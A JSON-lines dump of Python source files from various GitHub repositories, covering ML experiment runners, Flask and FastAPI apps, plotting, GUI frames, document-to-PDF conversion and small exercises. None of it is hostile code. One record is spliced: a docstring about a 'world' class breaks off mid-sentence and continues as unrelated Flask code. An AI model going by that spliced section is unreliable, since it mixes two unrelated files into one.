id_partition = partition_progress.add_task(f\"[red]{partition_name}[/red]\")\n            if partition.shape[0] > 0:\n                partition_file_name = (\n                    partitions_dir / f\"{problem_name}_{partition_name}.csv\"\n                )\n                splits, partition = prepare_data(\n                    partition,\n                    n_splits=n_splits,\n                    seed=seed,\n                    index_file=str(partition_file_name),\n                )\n                results = run_experiments(partition, splits)\n                results.to_excel(writer, f\"{partition_name}_tests\")\n                results.groupby([\"scale\", \"preprocess\", \"regressor\"]).agg(\n                    [\"mean\", \"std\"]\n                ).to_excel(writer, f\"{partition_name}\")\n            partition_progress.stop_task(id_partition)\n            partition_progress.update(\n                id_partition, description=f\"[green]{partition_name}[/green]\"\n            )\n    screen_header(\"Writing the report\")\n    report(\"Printing output to\", results_filename)\n\n\nif __name__ == \"__main__\":\n    typer.run(regression)\n","repo_name":"ennanco/labML","sub_path":"labml/commands/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10338814371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nIn this file, I create the world class. This class will let me instantiate different worlds.\r\nMy world will have several instance variables, but the most important ones are the height and the width of the world.\r\nThe world is an orthonormal coordinate system with 0')\ndef story(story_id=None):\n    csv_loader = file_minator.csv_loader(\"stories.csv\")\n    return render_template(\"story.html\", story_id=story_id, stories=csv_loader)\n\n\ndef delete(id_to_delete):\n    file_minator.csv_remover(\"stories.csv\", id_to_delete)\n    return homepage()\n\n\n@app.route('/list', methods=['POST', 'GET', \"DELETE\"])\ndef post(story_id=None, id_to_delete=None):\n    if request.method == \"DELETE\":\n        delete_info = request.form['delete']\n        print(True)\n    loaded_infos = file_minator.csv_loader(\"stories.csv\")\n    info1 = request.form['story_title']\n    info2 = request.form['user_story'].replace(\"\\r\", ' ').replace(\"\\n\", ' ')\n    info3 = request.form['accept_crit'].replace(\"\\r\", \" \").replace(\"\\n\", ' ')\n    info4 = request.form['business_value']\n    info5 = request.form['estimation']\n    info6 = request.form['status']\n    bunch_of_new_info = [info1, info2, info3, info4, info5, info6]\n    for item in range(len(loaded_infos)):\n        if info1 in loaded_infos[item][0]:\n            file_minator.csv_remover(\"stories.csv\", loaded_infos[item][0])\n    file_minator.csv_saver(\"stories.csv\", bunch_of_new_info)\n    return homepage()\n\n\n@app.route('/lofasz')\ndef lofasz():\n    return render_template(\"post_story.html\")\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"kotoszo/super-sprinter-3000-annakonda","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72511129111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 30 19:17:42 2022\n\n@author: NEEL SHAH\n\"\"\"\n\n\nimport pandas as pd\nimport plotly.express as px\n\n#df = pd.read_csv(r'fILE PATH\\FinalCSV.csv')\ndf = pd.read_csv(r'D:\\NSII\\FSI-MAVs\\FinalCSV.csv')\n\ndf = pd.melt(df,id_vars=['PARAMETERS'],var_name='Birds', value_name='Value', \n             value_vars = ['Chickadee','Hoopoe','Tern','Pigeon','Lark','Finch','Magpie'], )\n\n\nfig = px.line_polar(df, r='Value', theta='Birds', color='PARAMETERS',line_close=(True),\n                    line_shape='linear',hover_name='PARAMETERS',hover_data = 
{'PARAMETERS':False},\n markers=(True), direction='clockwise',start_angle=45)\n\nfig.update_traces(fill = 'toself')\n \nfig.show()\n\n","repo_name":"fedorukben/ornithopter-mavs","sub_path":"radarMap.py","file_name":"radarMap.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41511260671","text":"import customtkinter as ctk\n\nfrom card_field import CardField\n\n\nclass MainFrame(ctk.CTkScrollableFrame):\n def __init__(self, master, **kwargs):\n super().__init__(master, **kwargs)\n self.columns = []\n\nclass ColumnFrame(ctk.CTkScrollableFrame):\n def __init__(self, master, name, id, **kwargs):\n super().__init__(master, **kwargs)\n self.name = name\n self.master = master\n self.id = id\n self.next = None\n self.label = None\n self.cards = []\n self.column_color = kwargs.get('border_color', '#000000')\n self._scrollbar.configure(width=7, border_spacing=1, corner_radius=100)\n\n def asdict(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'cards': {i: card.asdict() for i, card in enumerate(self.cards) if card},\n 'column_color': self.column_color,\n }\n\n def add_card(self, text):\n new_card = CardField(\n self,\n wrap='word',\n border_spacing=2,\n width=225,\n height=100,\n border_width=2,\n font=('Verdana', 12),\n border_color=self.column_color,\n )\n row = len(self.cards)\n new_card.insert('0.0', text)\n new_card.grid(\n row=row, column=0,\n pady=(0, 20),\n )\n new_card.id = row\n self.cards.append(new_card)\n\n def edit_column_name(self, button):\n curr_text = self.label.cget('text')\n dialog = ctk.CTkInputDialog(\n text='Enter a new name for the column', title='Edit Column'\n )\n text = dialog.get_input()\n self.label.configure(text=text.strip() if text else curr_text)\n ","repo_name":"xbandrade/kanban-board","sub_path":"custom_frames.py","file_name":"custom_frames.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29089930113","text":"import numpy as np\n\n\nclass BoundingBox:\n def __init__(self, shape=(0, 0)) -> None:\n self.empty = False\n if shape[0] == 0 and shape[1] == 0:\n self.empty = True\n\n self.accuracy = 1\n self.img_height = shape[0]\n self.img_width = shape[1]\n\n self.x_min = 0\n self.y_min = 0\n self.x_max = 0\n self.y_max = 0\n\n self.x_cent = 0\n self.y_cent = 0\n self.width = 0\n self.height = 0\n self.half_width = 0\n self.half_height = 0\n\n def isEmpty(self):\n return self.empty\n\n def get(self):\n return (self.y_min, self.x_min, self.y_max, self.x_max)\n\n def getRotate180(self):\n y_max = self.img_height - self.y_min\n x_max = self.img_width - self.x_min\n y_min = self.img_height - self.y_max\n x_min = self.img_width - self.x_max\n return (y_min, x_min, y_max, x_max)\n\n def getArea(self):\n return self.width * self.height\n\n def load(self, xmin, ymin, xmax, ymax):\n self.x_min = xmin\n self.y_min = ymin\n self.x_max = xmax\n self.y_max = ymax\n\n def loadYolo(self, data: np.ndarray):\n try:\n if data.shape[0] == 5:\n self.x_cent = int(data[1] * self.img_width)\n self.y_cent = int(data[2] * self.img_height)\n self.width = int(data[3] * self.img_width)\n self.height = int(data[4] * self.img_height)\n elif data.shape[0] == 6:\n self.accuracy = data[1]\n self.x_cent = int(data[2] * self.img_width)\n self.y_cent = int(data[3] * self.img_height)\n self.width = int(data[4] * self.img_width)\n self.height = int(data[5] * self.img_height)\n\n 
self.half_height = (self.height // 2) - 1\n self.half_width = (self.width // 2) - 1\n\n self.y_min = self.y_cent - self.half_height\n self.x_min = self.x_cent - self.half_width\n self.y_max = self.y_cent + self.half_height\n self.x_max = self.x_cent + self.half_width\n except Exception as e:\n print(e)\n print(data)\n\n def updateCenter(self, X_cent):\n self.x_cent = X_cent[0]\n self.y_cent = X_cent[1]\n self.y_min = self.y_cent - self.half_height\n self.x_min = self.x_cent - self.half_width\n self.y_max = self.y_cent + self.half_height\n self.x_max = self.x_cent + self.half_width\n\n def getCenter(self, homogenous=True):\n if homogenous:\n return np.array([self.x_cent, self.y_cent, 1], dtype=np.float64)\n else:\n return np.array([self.x_cent, self.y_cent])\n\n def __str__(self) -> str:\n string = \"xmin: {}, xmax: {}, ymin: {}, ymax: {}\".format(\n self.x_min, self.x_max, self.y_min, self.y_max\n )\n return string\n","repo_name":"AleRiccardi/label-clouds","sub_path":"label/types/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1105739255","text":"#!/usr/bin/python3\n\n\"\"\"\n this is a script that prints all City objects\n from the database hbtn_0e_14_usa\n\"\"\"\n\n\nfrom sys import argv\nfrom model_state import Base, State\nfrom model_city import City\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\n\n\nif __name__ == '__main__':\n engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'.format(\n argv[1], argv[2], argv[3]),\n pool_pre_ping=True)\n\n Session = sessionmaker(bind=engine)\n Base.metadata.create_all(engine)\n\n session = Session()\n\n cities = session.query(State, City).filter(State.id == City.state_id)\n\n for citie in cities:\n print(\"{}: ({}) {}\".format(citie.State.name,\n citie.City.id,\n citie.City.name))\n\n session.close()\n","repo_name":"chaher13/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/14-model_city_fetch_by_state.py","file_name":"14-model_city_fetch_by_state.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"679976629","text":"from PyPDF2 import PdfFileReader, PdfFileWriter\nfrom PyPDF2.utils import PdfReadError\nfrom reportlab.pdfgen import canvas\nfrom PIL import Image\nimport zipfile\nimport win32com.client\nfrom tempfile import mktemp\nfrom threading import Thread\n\nclass Mixin(object):\n\n def __init__(self, files):\n \"\"\"\n\n state 状态码:\n 0 未启动\n 1 测试\n 2 转换为pdf\n 3 盖章\n 4 合并\n \"\"\"\n self.files = files\n self.err = None\n self.errcode = 0\n self.prgbar_max = 0\n self.prgbar_val = 0\n self.state = 0\n self.doc = []\n self.xls = []\n self.pdf = []\n self.outfile = None\n\nclass Checker(Mixin):\n\n def check(self):\n \"\"\"检测并提示错误\n err为3 pdf检测错误\n err为2 xls检测错误\n err为1 doc检测错误\n\n 如果合法的话,就按照分类分好\n \"\"\"\n self.state = 1\n self.prgbar_max = len(self.files.keys())\n self.prgbar_val = 0\n for item in self.files.keys():\n self.prgbar_val += 1\n filepath = self.files[item][0]\n if filepath.endswith('.pdf'):\n if not self.isValidPdf(filepath):\n self.errcode = 3\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n self.pdf.append(item)\n elif filepath.endswith('.xls') or filepath.endswith('.xlsx'):\n if not self.isValidXls(filepath):\n self.errcode = 2\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n 
self.xls.append(item)\n elif filepath.endswith('.dox') or filepath.endswith('.docx'):\n if not self.isValidDoc(filepath):\n self.errcode = 1\n self.err = '{} 不合法'.format(filepath)\n break\n else:\n self.doc.append(item)\n\n def isdir(self, z, name):\n \"\"\"检查是否为一个目录\n \"\"\"\n return any(x.startswith(\"%s/\" % name.rstrip(\"/\")) for x in z.namelist())\n\n def isValidDoc(self, filename):\n \"\"\"检查word文件是否合法\n \"\"\"\n try:\n with zipfile.ZipFile(filename, 'r') as f:\n state = self.isdir(f, \"word\") and self.isdir(f, \"docProps\") and self.isdir(f, \"_rels\")\n\n return state\n except zipfile.BadZipfile:\n return False\n\n def isValidXls(self, filename):\n \"\"\"检查excel文件是否合法\n \"\"\"\n try:\n with zipfile.ZipFile(filename, 'r') as f:\n state = self.isdir(f, \"xl\") and self.isdir(f, \"docProps\") and self.isdir(f, \"_rels\")\n\n return state\n except zipfile.BadZipfile:\n return False\n\n def isValidPdf(self, filename):\n \"\"\"检查pdf文件是否合法\n \"\"\"\n with open(filename, 'rb') as f:\n try:\n PdfFileReader(f)\n state = True\n except PdfReadError:\n state = False\n\n return state\n\nclass Converter(Mixin):\n def docToPdf(self, filename):\n \"\"\"word转为pdf\n\n 先尝试使用office word来做转换,\n 再使用wps来做转换。\n\n office软件转换文档为pdf时,会自动加上pdf结尾,\n 所以返回的临时文件要加上pdf的后缀。\n \"\"\"\n tempfile = mktemp()\n wdFormatPDF = 17\n use_wps = False\n state = False\n try:\n word = win32com.client.Dispatch('Word.Application')\n doc = word.Documents.Open(filename)\n doc.SaveAs(tempfile, FileFormat=wdFormatPDF)\n doc.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n use_wps = True\n finally:\n try:\n word.Quit()\n except Exception as e:\n self.err = str(e)\n\n # wps转换\n if use_wps:\n try:\n wps = win32com.client.Dispatch(\"KWPS.Application\")\n doc = wps.Documents.Open(filename)\n doc.SaveAs(tempfile, wdFormatPDF)\n doc.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n self.errcode = 10\n finally:\n try:\n wps.Quit()\n except Exception:\n self.errcode = 110\n\n if state:\n return \"{}.pdf\".format(tempfile)\n else:\n return False\n\n def xlsToPdf(self, filename):\n \"\"\"execl转为pdf\n\n 先使用excel来做转换,再使用et来做转换\n \"\"\"\n tempfile = mktemp()\n xlFormatPDF = 57\n use_et = False # 是否使用et\n state = False # 转换状态\n # excel = comtypes.client.CreateObject('Excel.Application')\n try:\n excel = win32com.client.Dispatch('Excel.Application')\n wb = excel.Workbooks.Open(filename)\n wb.SaveAs(tempfile, FileFormat=xlFormatPDF)\n wb.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n use_et = True\n finally:\n try:\n excel.Quit()\n except Exception as e:\n self.err = str(e)\n # et转换\n if use_et:\n try:\n et = win32com.client.Dispatch('KET.Application.9')\n workbook = et.Workbooks.Open(filename)\n workbook.ExportAsFixedFormat(0, tempfile)\n workbook.Close()\n state = True\n except Exception as e:\n self.err = str(e)\n self.errcode = 11\n finally:\n try:\n et.Quit()\n except Exception:\n self.errcode = 111\n\n if state:\n return \"{}.pdf\".format(tempfile)\n else:\n return False\n\n def convert(self):\n \"\"\"转换为pdf\n \"\"\"\n self.state = 2\n self.prgbar_max = len(self.doc) + len(self.xls)\n self.prgbar_val = 0\n for item in self.doc:\n self.prgbar_val += 1\n filepath = self.files[item][0]\n trans = self.docToPdf(filepath)\n if trans is not None:\n self.files[item][0] = trans\n else:\n return 2\n for item in self.xls:\n self.prgbar_val += 1\n filepath = self.files[item][0]\n trans = self.xlsToPdf(filepath)\n if trans is not None:\n self.files[item][0] = trans\n else:\n return 2\n\n 
return 0\n\nclass WaterMark(Mixin):\n\n def mark(self, filename):\n \"\"\"添加水印\n\n pdf添加水印只能通过新建一个pdf,在新建的\n 文件中添加图片,然后保存。\n 将新建的文件与水印文件,合并。一页一页地\n 合并,完成后生成新文件即可。\n 由于长宽不确定所以,计算了大概印章的位置,\n 利用黄金分割比。\n\n 返回输出文件\n \"\"\"\n tempmark = mktemp() # 水印文件\n tempout = mktemp() # 输出文件\n item = self.files[filename]\n # 获取长宽\n infile = PdfFileReader(open(item[0], 'rb'))\n rate = 0.618\n mdbox = list(infile.getPage(0).mediaBox)\n # 按照黄金分割率放置图片\n width = float(mdbox[2] - mdbox[0])\n height = float(mdbox[3] - mdbox[1])\n # 渲染图片\n img = self.transparent(item[1], width, height)\n # 新建一个新的pdf\n c = canvas.Canvas(tempmark)\n c.drawImage(img, width * rate, height * rate, mask='auto')\n c.save()\n # 打开pdf\n watermark = PdfFileReader(open(tempmark, 'rb'))\n outfile = PdfFileWriter()\n\n pagecount = infile.getNumPages()\n\n # 为每一页添加水印\n for page_num in range(pagecount):\n self.prgbar_val += 1\n inpage = infile.getPage(page_num)\n inpage.mergePage(watermark.getPage(0))\n outfile.addPage(inpage)\n\n # 输出到输出文件\n with open(tempout, 'wb') as outpdf:\n outfile.write(outpdf)\n\n return tempout\n\n def setMark(self):\n self.state = 3\n self.prgbar_max = 0\n self.prgbar_val = 0\n # 计算总页数\n for item in [*self.doc, *self.xls, *self.pdf]:\n if isinstance(self.files[item][1], str):\n src = self.files[item][0]\n pdfreader = PdfFileReader(open(src, 'rb'))\n self.prgbar_max += pdfreader.getNumPages()\n # 操作\n for item in [*self.doc, *self.xls, *self.pdf]:\n if isinstance(self.files[item][1], str):\n self.files[item][0] = self.mark(item)\n\n def transparent(self, image, width, height):\n \"\"\"透明化处理\"\"\"\n handle_file = mktemp() + '.png'\n img = Image.open(image)\n img = img.convert(\"RGBA\")\n # 保持宽高比,将图片变为pdf高度的1/6\n sheight = height / 6.0\n swidth = img.width * sheight / img.height\n img = img.resize((int(swidth), int(sheight)))\n # 全部设为0.75透明\n img.putalpha(192)\n data = img.getdata()\n\n # 处理全部白色为全透明\n new_data = []\n for ele in data:\n if ele[0] == 255 and ele[1] == 255\\\n and ele[2] == 255:\n new_data.append((255, 255, 255, 0))\n elif ele[0] == 0 and ele[1] == 0\\\n and ele[2] == 0:\n new_data.append((255, 255, 255, 0))\n else:\n new_data.append(ele)\n img.putdata(new_data)\n img.save(handle_file, \"PNG\")\n\n return handle_file\n\nclass FullConverter(Checker, Converter, WaterMark):\n\n def concat(self):\n \"\"\"将多个pdf文件合成一个\"\"\"\n self.prgbar_max = 0\n self.prgbar_val = 0\n tempout = mktemp()\n outfile = PdfFileWriter()\n # 计算总页数\n for item in [*self.doc, *self.xls, *self.pdf]:\n src = self.files[item][0]\n pdfreader = PdfFileReader(open(src, 'rb'))\n self.prgbar_max += pdfreader.getNumPages()\n for item in self.files.values():\n infile = PdfFileReader(open(item[0], 'rb'))\n pagecount = infile.getNumPages()\n for page_num in range(pagecount):\n self.prgbar_val += 1\n inpage = infile.getPage(page_num)\n outfile.addPage(inpage)\n\n with open(tempout, 'wb') as pdfout:\n outfile.write(pdfout)\n\n return tempout\n\n def execute(self):\n \"\"\"执行流程与check处理\n \"\"\"\n self.check()\n if self.errcode != 0:\n return 1\n else:\n if self.errcode == 0:\n self.convert()\n if self.errcode == 0:\n self.setMark()\n if self.errcode == 0:\n self.outfile = self.concat()\n\n def run(self):\n \"\"\"子进程方式运行\n \"\"\"\n self.p = Thread(target=self.execute, args=())\n self.p.start()\n","repo_name":"ssfdust/OfficeConventer","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} 
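The convert.py record above stamps a PDF by first rendering the watermark image onto a one-page overlay (a reportlab canvas) and then merging that overlay into every source page. A minimal standalone sketch of just the merge step, assuming the same legacy PyPDF2 1.x PdfFileReader/PdfFileWriter API the record imports; the file names are placeholders, not paths taken from the record:

from PyPDF2 import PdfFileReader, PdfFileWriter

# Placeholder file names, not taken from the record above.
source = PdfFileReader(open("input.pdf", "rb"))       # document to stamp
overlay = PdfFileReader(open("watermark.pdf", "rb"))  # one-page overlay PDF

writer = PdfFileWriter()
for page_num in range(source.getNumPages()):
    page = source.getPage(page_num)
    page.mergePage(overlay.getPage(0))  # composite the overlay onto this page
    writer.addPage(page)

with open("stamped.pdf", "wb") as out:
    writer.write(out)

mergePage composites the overlay's content stream on top of the target page, which is why the record pre-renders the watermark at page coordinates (width * 0.618, height * 0.618) before doing the page-by-page merge.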
+{"seq_id":"72669661593","text":"from datetime import datetime, timedelta\n\nimport jwt\nfrom decouple import config\nfrom fastapi import HTTPException\nfrom fastapi.security import HTTPBearer\nfrom fastapi.security.utils import get_authorization_scheme_param\nfrom starlette.requests import Request\n\nfrom domain.models import User\nfrom logger import logger\nfrom schemas.enums import Roles\nfrom schemas.user import UserRegisterIn\nfrom service_layer.unit_of_work import SqlalchemyUnitOfWork\n\n\nclass AuthManager:\n @staticmethod\n def encode_token(user: User):\n try:\n payload = {\n \"email\": user.email,\n \"exp\": datetime.utcnow() + timedelta(minutes=120),\n }\n return jwt.encode(payload, config(\"SECRET_KEY\"), algorithm=\"HS256\")\n except Exception as ex:\n logger.error(f\"Error while encoding token: {ex}\")\n raise ex\n\n @staticmethod\n def get_user_from_token(credentials, request, uow):\n \"\"\"\n Get user from token\n Args:\n credentials:\n request:\n uow:\n\n Returns:\n\n \"\"\"\n try:\n payload = jwt.decode(\n credentials, config(\"SECRET_KEY\"), algorithms=[\"HS256\"]\n )\n user_data = uow.repository.get(\n User, dict_to_filter={\"email\": payload[\"email\"]}\n )\n request.state.user = user_data\n return user_data\n except jwt.ExpiredSignatureError:\n raise HTTPException(401, \"Token is expired\")\n except jwt.InvalidTokenError:\n raise HTTPException(401, \"Invalid token\")\n\n\nclass CustomHHTPBearer(HTTPBearer):\n \"\"\"\n Custom HTTP Bearer class to handle user authentication\n \"\"\"\n\n async def __call__(self, request: Request):\n authorization = request.headers.get(\"Authorization\")\n _, credentials = get_authorization_scheme_param(authorization)\n uow = SqlalchemyUnitOfWork()\n if credentials:\n with uow:\n user_data = AuthManager.get_user_from_token(credentials, request, uow)\n\n request.state.user = UserRegisterIn.from_orm(user_data)\n else:\n request.state.user = User(role=Roles.anonymous, email=\"\")\n\n\noauth2_scheme = CustomHHTPBearer()\n\n\ndef is_admin(request: Request):\n if not request.state.user.role == Roles.admin:\n raise HTTPException(403, \"Forbidden\")\n\n\ndef is_super_admin(request: Request):\n if not request.state.user.role == Roles.super_admin:\n raise HTTPException(403, \"Forbidden\")\n\n\ndef is_admin_or_super_admin(request: Request):\n if not request.state.user.role in [Roles.admin, Roles.super_admin]:\n raise HTTPException(403, \"Forbidden\")\n","repo_name":"jval7/catalog-challenge","sub_path":"service_layer/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13817622083","text":"'''\nGiven an array of strictly the characters 'R', 'G', and 'B', segregate\nthe values of the array so that all the Rs come first, the Gs come\nsecond, and the Bs come last. 
You can only swap elements of the array.\n\nDo this in linear time and in-place.\n'''\n\ndef swap_array(array, i, j):\n array[i], array[j] = array[j], array[i]\n\n\ndef arrange_array(array):\n g0 = -1\n g1 = -1\n b0 = -1\n\n for i, e in enumerate(array):\n if e == 'B':\n if b0 < 0:\n b0 = i\n\n if e == 'G':\n if g0 >= 0: \n if b0 >= 0:\n swap_array(array, b0, i)\n\n g1 = b0\n b0 = b0 + 1\n else:\n g1 = g1 + 1\n else:\n if b0 >= 0:\n swap_array(array, b0, i)\n\n g0 = b0\n g1 = b0\n b0 = b0 + 1\n else:\n g0 = i\n g1 = i\n\n if e == 'R':\n if b0 >= 0:\n if g0 >= 0:\n swap_array(array, b0, i)\n swap_array(array, g0, b0)\n\n g0 = g0 + 1\n g1 = g1 + 1\n b0 = b0 + 1\n else:\n swap_array(array, b0, i)\n\n b0 = b0 + 1\n else:\n if g0 >= 0:\n swap_array(array, g0, i)\n\n g0 = g0 + 1\n g1 = i\n\n return array\n\ndef arrange_array_2(array):\n idx_low = 0\n idx_mid = 0\n idx_high = len(array) - 1\n\n while idx_mid < idx_high:\n if array[idx_mid] == 'B':\n swap_array(array, idx_mid, idx_high)\n idx_high -= 1\n\n if array[idx_mid] == 'R':\n swap_array(array, idx_mid, idx_low)\n idx_low += 1\n idx_mid += 1\n\n if array[idx_mid] == 'G':\n idx_mid += 1\n\n return(array)\n\n\narray_test = ['G', 'B', 'R', 'R', 'B', 'R', 'G']\n\nprint(f'Sorting array {array_test} with method 1:')\narray_sorted = arrange_array(array_test.copy())\nprint(array_sorted)\n\nprint(f'Sorting array {array_test} with method 2:')\narray_sorted_2 = arrange_array_2(array_test.copy())\nprint(array_sorted_2)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"bcadenato/dailycodingproblem","sub_path":"problems/problem_35.py","file_name":"problem_35.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32498098246","text":"from configparser import ConfigParser\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\n\nimport streamlit as st\n\nfrom dea import CONFIG\nfrom dea import DEFAULTS\nfrom dea import _DATA_DIR\nfrom dea import filter\nfrom dea import io\nfrom dea import plot\nfrom dea.mapselect import mapselect\nfrom dea import retrofit\n\nDeaSelection = Dict[str, Any]\n\n\ndef main(\n defaults: DeaSelection = DEFAULTS,\n data_dir: Path = _DATA_DIR,\n config: ConfigParser = CONFIG,\n):\n st.header(\"Welcome to the Dublin Retrofitting Tool\")\n\n small_area_boundaries = io.load_small_area_boundaries(\n url=config[\"urls\"][\"small_area_boundaries\"], data_dir=data_dir\n )\n\n with st.form(key=\"Inputs\"):\n st.markdown(\"ℹ️ Click `Submit` once you've selected all parameters\")\n selected_energy_ratings = st.multiselect(\n \"Select BER Ratings\",\n options=[\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"],\n default=[\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"],\n )\n selected_small_areas = mapselect(\n column_name=\"small_area\", boundaries=small_area_boundaries\n )\n retrofit_selections = _retrofitselect(defaults)\n inputs_are_submitted = st.form_submit_button(label=\"Submit\")\n\n if inputs_are_submitted:\n pre_retrofit = io.load_selected_buildings(\n url=config[\"urls\"][\"bers\"],\n data_dir=data_dir,\n selected_energy_ratings=selected_energy_ratings,\n selected_small_areas=selected_small_areas,\n )\n\n with st.spinner(\"Retrofitting buildings...\"):\n post_retrofit = retrofit.retrofit_buildings(\n buildings=pre_retrofit, selections=retrofit_selections\n )\n\n pre_vs_post_bers = retrofit.calculate_ber_improvement(\n pre_retrofit=pre_retrofit, post_retrofit=post_retrofit\n )\n pre_vs_post_hps = 
retrofit.calculate_heat_pump_viability_improvement(\n pre_retrofit=pre_retrofit, post_retrofit=post_retrofit\n )\n\n plot.plot_ber_rating_comparison(pre_vs_post_bers)\n plot.plot_heat_pump_viability_comparison(pre_vs_post_hps)\n plot.plot_retrofit_costs(post_retrofit=post_retrofit)\n\n\ndef _retrofitselect(defaults: DeaSelection) -> DeaSelection:\n selections = defaults.copy()\n for component, properties in defaults.items():\n with st.expander(label=f\"Change {component} defaults\"):\n selections[component][\"uvalue\"][\"target\"] = st.number_input(\n label=\"Threshold U-Value [W/m²K] - assume no retrofits below this value\",\n min_value=float(0),\n value=properties[\"uvalue\"][\"target\"],\n key=component + \"_threshold\",\n step=0.05,\n )\n c1, c2 = st.beta_columns(2)\n selections[component][\"cost\"][\"lower\"] = c1.number_input(\n label=\"Lowest* Likely Cost [€/m²]\",\n min_value=0,\n value=properties[\"cost\"][\"lower\"],\n key=component + \"_cost_lower\",\n step=5,\n )\n selections[component][\"cost\"][\"upper\"] = c2.number_input(\n label=\"Highest** Likely Cost [€/m²]\",\n min_value=0,\n value=properties[\"cost\"][\"upper\"],\n key=component + \"_cost_upper\",\n step=5,\n )\n footnote = f\"\"\"\n * {properties[\"typical_area\"] * properties[\"cost\"][\"lower\"]}€\n for a typical {component} area of {properties[\"typical_area\"]}m²
    \n ** {properties[\"typical_area\"] * properties[\"cost\"][\"upper\"]}€\n for a typical {component} area of {properties[\"typical_area\"]}m²
    \n \"\"\"\n st.markdown(footnote, unsafe_allow_html=True)\n\n selections[component][\"percentage_selected\"] = st.slider(\n f\"\"\"% of viable {component}s retrofitted to U-Value =\n {selections[component]['uvalue']['target']} [W/m²K]\"\"\",\n min_value=0.0,\n max_value=1.0,\n value=0.0,\n key=component + \"_percentage\",\n )\n\n return selections\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codema-dev/dublin-energy-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42076478178","text":"from generic_lotto import LottoBlower\n\nmachine = LottoBlower[int]([1, .2])\n## error: List item 1 has incompatible type \"float\"; # <1>\n## expected \"int\"\n\nmachine = LottoBlower[int](range(1, 11))\n\nmachine.load('ABC')\n## error: Argument 1 to \"load\" of \"LottoBlower\" # <2>\n## has incompatible type \"str\";\n## expected \"Iterable[int]\"\n## note: Following member(s) of \"str\" have conflicts:\n## note: Expected:\n## note: def __iter__(self) -> Iterator[int]\n## note: Got:\n## note: def __iter__(self) -> Iterator[str]\n\n","repo_name":"fluentpython/example-code-2e","sub_path":"15-more-types/lotto/generic_lotto_errors.py","file_name":"generic_lotto_errors.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2375,"dataset":"github-code","pt":"5"} +{"seq_id":"36633034526","text":"from db.model import Article, User\nfrom db.session import Session\n\n\ndef main():\n session = Session()\n article_1 = session.query(Article).filter(Article.id == 1).one()\n print(article_1.author)\n\n article_2 = session.query(Article).filter(Article.id == 3).one()\n print(article_2.author)\n\n user = session.query(User).filter_by(id=201).one()\n print(user.articles)\n\n user.articles.append(\n Article(title=\"Cute panda #2\", content=\"...\")\n )\n session.commit()\n\n print(user.articles)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SDA-workshops/sdaportal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"12576361933","text":"#while loop\n#initilization\n#condition\n#incrementation\n\n#print 1..........10 numbers\ni=1 # initilization #---->where we have to start\n\nwhile i<=10: #----> condition where we have to stop\n print(i)\n i=i+1 #how much value we have increment every time\nprint(\"Done!!!\")\n\ni=10\n\nwhile i>=1:\n print(i)\n i=i-1\nprint(\"Done!!!\") ","repo_name":"NesibeOzer-32/pycharmProjects","sub_path":"Pythontraining/day3/WhileLoopDemo.py","file_name":"WhileLoopDemo.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25495173015","text":"import matchAddresses as mAdd\n\n# Create matchAddresses class\nclnAdd = mAdd.matchAddresses(\n\t# Directory of first dataset\n\tinDir1 = '~/InputDirectory1', \n\t# File name of first dataset\n\tinDSN1 = 'Dataset1.csv', \n\t# Extra variables to keep from first dataset\n\tkeepVars1 = ['categories','is_closed','price','rating','review_count'],\n\t# Address variable names in first dataset (as they are)\n\taddressVarsList1 = ['address1','address2','city','zip_code','name'], \n\t# Types of address variables in the first dataset \n\t# (can be 
